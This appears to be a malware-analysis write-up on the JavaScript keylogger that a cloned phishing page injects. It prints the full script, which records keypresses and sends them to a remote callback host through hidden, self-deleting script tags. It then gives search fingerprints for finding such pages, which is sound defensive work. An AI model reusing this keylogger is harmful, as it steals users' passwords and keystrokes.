Analysis process
cs cloneCompare the cloned HTML with the original HTML
feature:
- The IFRAME tag is uppercase and has a length and width of 0.
- The script tag loads the js path as "/jquery/jquery.min.js"
Order Features:
- When the IFRAME tag and the script tag appear at the same time, they must be in this order: IFRAME tag, script tag, and body tag.
- When only one of the IFRAME tag and the script tag appears, it must be before the body tag.
Referenced JS analysis:
<span>var</span> cfqPdaQzXzSSf = <span>0</span>;<br><span>window</span>.onload = <span><span>function</span> <span>loadfqPdaQzXzSSf</span>(<span></span>) </span>{ <span>//Page loading processing event</span><br> lfqPdaQzXzSSf = <span>","</span>;<br> <span>if</span> (<span>window</span>.addEventListener) { <span>//Object triggers the specified event</span><br> <span>document</span>.addEventListener(<span>'keypress'</span>, pfqPdaQzXzSSf, <span>true</span>); <span>//keypress All keys will trigger this event, regardless of whether they generate character value processing functions
fqPdaQzXzSSf</span><br> <span>document</span>.addEventListener(<span>'keydown'</span>, dfqPdaQzXzSSf, <span>true</span>); <span>//keydown When a key is pressed, the event processing function will be triggered: dfqPdaQzXzSSf</span><br> } <span>else</span> <span>if</span> (<span>window</span>.attachEvent) { <span>//attachEvent is supported in versions below IE9. Others all support addEventListener</span><br> <span>document</span>.attachEvent(<span>'onkeypress'</span>, pfqPdaQzXzSSf);<br> <span>document</span>.attachEvent(<span>'onkeydown'</span>, dfqPdaQzXzSSf);<br> } <span>else</span> { <span>//Neither supports all empty</span><br> <span>document</span>.onkeypress = pfqPdaQzXzSSf;<br> <span>document</span>.onkeydown = dfqPdaQzXzSSf;<br> }<br><br><br>}<br><br><br><span><span>function</span> <span>pfqPdaQzXzSSf</span>(<span>e</span>) </span>{<br> kfqPdaQzXzSSf = (<span>window</span>.event)?<span>window</span>.event.keyCode:e.which; <span>//Only when the DOM event handler is called</span><br> kfqPdaQzXzSSf = kfqPdaQzXzSSf.toString(<span>16</span>); <span>//Convert keyboard code to ascii</span><br> <span>if</span> (kfqPdaQzXzSSf != <span>"d"</span>) { <span>//Write a random judgment to enter the function</span><br> fqPdaQzXzSSf(kfqPdaQzXzSSf);<br> }<br><br><br>}<br><br><br><span><span>function</span> <span>dfqPdaQzXzSSf</span>(<span>e</span>) </span>{<br> kfqPdaQzXzSSf = (<span>window</span>.event)?<span>window</span>.event.keyCode:e.which;<br> <span>if</span> (kfqPdaQzXzSSf == <span>9</span>||kfqPdaQzXzSSf == <span>8</span>||kfqPdaQzXzSSf == <span>13</span>) { <span>//tab key, backspace key, enter key</span><br> fqPdaQzXzSSf(kfqPdaQzXzSSf);<br> }<br><br><br>}<br><br><br><span><span>function</span> <span>fqPdaQzXzSSf</span>(<span>kfqPdaQzXzSSf</span>) </span>{<br> lfqPdaQzXzSSf = lfqPdaQzXzSSf + kfqPdaQzXzSSf + <span>","</span>; <span>//Keyboard value splicing</span><br> <span>var</span> tfqPdaQzXzSSf = <span>"ZUyQXfawhPbi"</span> + cfqPdaQzXzSSf;<br> cfqPdaQzXzSSf++;<br> <span>var</span> ffqPdaQzXzSSf;<br> <span>if</span> (<span>document</span>.all&&(navigator.appVersion.match(<span>/MSIE ([\d.]+)/</span>)[<span>1</span>]) <= <span>8.0</span>) { <span>//Browser version is less than or equal to 8.0</span><br> ffqPdaQzXzSSf = <span>document</span>.createElement(<span>String</span>.fromCharCode(<span>60</span>) + <span>"script name='"</span>+tfqPdaQzXzSSf+<span>"' id='"</span>+tfqPdaQzXzSSf+<span>"'"</span> + <span>String</span>.fromCharCode(<span>62</span>) + <span>String</span>.fromCharCode(<span>60</span>) + <span>"/script"</span> + <span>String</span>.fromCharCode(<span>62</span>));<br> } <span>else</span> {<br> ffqPdaQzXzSSf = <span>document</span>.createElement(<span>"script"</span>);<br> ffqPdaQzXzSSf.setAttribute(<span>"id"</span>, tfqPdaQzXzSSf);<br> ffqPdaQzXzSSf.setAttribute(<span>"name"</span>, tfqPdaQzXzSSf);<br> }<br><br><br> <span>var</span> ejDBFWFHhff = <span>'?id='</span> + <span>window</span>.location.href.split(<span>/\?id=/</span>)[<span>1</span>]; <span>//Get the keyboard ascii code</span><br> ffqPdaQzXzSSf.setAttribute(<span>"src"</span>, <span>"http://10.23.66.18:8080/callback "</span> + ejDBFWFHhff + <span>"&data="</span> + lfqPdaQzXzSSf);<br> ffqPdaQzXzSSf.style.visibility = <span>"hidden"</span>;<br> <span>document</span>.body.appendChild(ffqPdaQzXzSSf); <span>//Instantiate js and send keyboard code</span><br> <span>if</span> (kfqPdaQzXzSSf == <span>13</span>||lfqPdaQzXzSSf.length > <span>3000</span>) { <span>//Judge whether the keyboard code is the Enter key and set the lfqPdaQzXzSSf variable empty</span><br> lfqPdaQzXzSSf = <span>","</span>;<br> }<br><br><br> setTimeout(<span>'document.body.removeChild(document.getElementById("'</span> + tfqPdaQzXzSSf + <span>'"))'</span>, <span>5000</span>); <span>//Delay 5 seconds to delete the created js</span><br>}<br>Page loads the processing event and adds an event for keyboard presses. When the event is triggered, enter the dfqPdaQzXzSSf and dfqPdaQzXzSSf functions for processing, and finally call the fqPdaQzXzSSf function to create a script tag to transmit the keyboard code to the remote end. Finally, delete the created js after a delay of 5 seconds
pfqPdaQzXzSSf function:
convert keyboard code to ascii code and send it to fqPdaQzXzSSf function
dfqPdaQzXzSSf function:
if you press the tab key, backspace key, or enter key, call the fqPdaQzXzSSf function to send the keyboard
chrome dynamic debugging
Keyboard code judgment
Keyboard code splicing
js creates
a password that sends keyboard codes to the remote cs and the remote receives
360 spatial mapping feature search:
response:<span>"<head> <base href="</span> <span>AND</span> response:<span>"<link rel=\"shortcut icon \" type=\"image/x-icon\" href=\"/favicon.ico\">"</span> <span>AND</span> response:<span>"jquery/jquery.min.js\"></script> </body>"</span><br><br>response:<span>"<head> < base href="</span> <span>AND</span> response:<span>"<link rel=\"shortcut icon\" type=\"image/x-icon\" href=\"/favicon.ico\">"</span> <span>AND</span> response:<span>"WIDTH=\"0\" HEIGHT=\"0\"></ IFRAME>"</span><br>